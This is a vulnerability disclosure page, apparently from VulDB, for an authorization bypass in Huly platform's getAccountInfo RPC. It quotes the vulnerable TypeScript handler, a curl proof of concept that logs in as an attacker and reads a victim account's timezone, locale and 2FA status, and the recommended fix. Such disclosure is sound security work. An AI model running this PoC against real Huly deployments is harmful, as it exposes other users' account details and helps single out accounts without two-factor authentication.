| Titolo | Huly hcengineering/platform <= 0.7.0 (confirmed on commit 18ef71b) Authorization Bypass Through User-Controlled SQL Primary Key |
|---|
| Descrizione | https://github.com/hcengineering/platform
Title: Account Info Disclosure -- Any Authenticated User Can Read Another User's Locale, Timezone, and 2FA Status
Package: hcengineering/platform
Affected Versions: <= 0.7.0 (confirmed on commit 18ef71b)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
CWE: CWE-639 -- Authorization Bypass Through User-Controlled Key
## GitHub Advisory
### Summary
The `getAccountInfo` RPC method in Huly's account service accepts an arbitrary
`accountId` UUID and returns that account's timezone, locale, and 2FA-enabled status.
The caller's identity is validated (valid JWT required) but the return value of
`decodeTokenVerbose` is discarded and no ownership check is performed. Any
authenticated user can look up this information for any other account UUID.
### Details
The vulnerable handler is `getAccountInfo` in
`server/account/src/operations.ts:2389-2407`:
```typescript
export async function getAccountInfo (
ctx: MeasureContext,
db: AccountDB,
branding: Branding | null,
token: string,
params: { accountId: AccountUuid }
): Promise<AccountInfo> {
const { accountId } = params // ← taken directly from caller's request
if (accountId == null || accountId === '') {
throw new PlatformError(...)
}
decodeTokenVerbose(ctx, token) // ← validates token, return value discarded
const account = await getAccount(db, accountId)
...
return { timezone: account?.timezone, locale: account?.locale, tfaEnabled: account?.tfaSecret != null }
}
```
`decodeTokenVerbose` returns `{ account, extra, ... }` containing the caller's
identity, but the return value is not used. The function simply validates that the
token is syntactically valid, then fetches and returns the record for the
caller-supplied `accountId` without verifying it matches the token's `account`.
The method is registered in the public dispatch table
(`server/account/src/operations.ts:3247, 3349`).
**Data exposed:** `timezone` (e.g. "America/New_York"), `locale` (e.g. "en-US"),
`tfaEnabled` (boolean indicating whether TOTP is configured). No passwords or PII.
### PoC
Prerequisites: Two Huly user accounts. Attacker knows (or can enumerate) the target
account UUID.
```bash
ATTACKER_TOKEN=$(curl -s -X POST https://huly-host/api/v1/login \
-H "Content-Type: application/json" \
-d '{"email":"[email protected]","password":"AttackerPass"}' | jq -r '.token')
curl -s -X POST https://huly-host/ \
-H "Content-Type: application/json" \
-H "Authorization: Bearer $ATTACKER_TOKEN" \
-d '{"method":"getAccountInfo","params":{"accountId":"<victim-account-uuid>"}}'
```
Response:
```json
{"result":{"timezone":"America/New_York","locale":"en-US","tfaEnabled":false}}
```
### Impact
Any authenticated user can determine the timezone, locale, and 2FA enrollment status
of any other account. The 2FA status flag could assist in targeting accounts with
weaker authentication. The information is not highly sensitive but the cross-account
read violates the principle of least privilege. Fix: compare the `accountId` parameter
to the caller's account UUID returned by `decodeTokenVerbose`, and reject requests
where they differ (unless the caller is an admin). |
|---|
| Fonte | ⚠️ https://github.com/hcengineering/platform |
|---|
| Utente | geochen (UID 78995) |
|---|
| Sottomissione | 19/05/2026 10:12 (27 giorni fa) |
|---|
| Moderazione | 14/06/2026 14:38 (26 days later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 370855 [hcengineering Huly Platform fino a 0.7.0 User Information operations.ts getAccountInfo escalationi di privilegi] |
|---|
| Punti | 20 |
|---|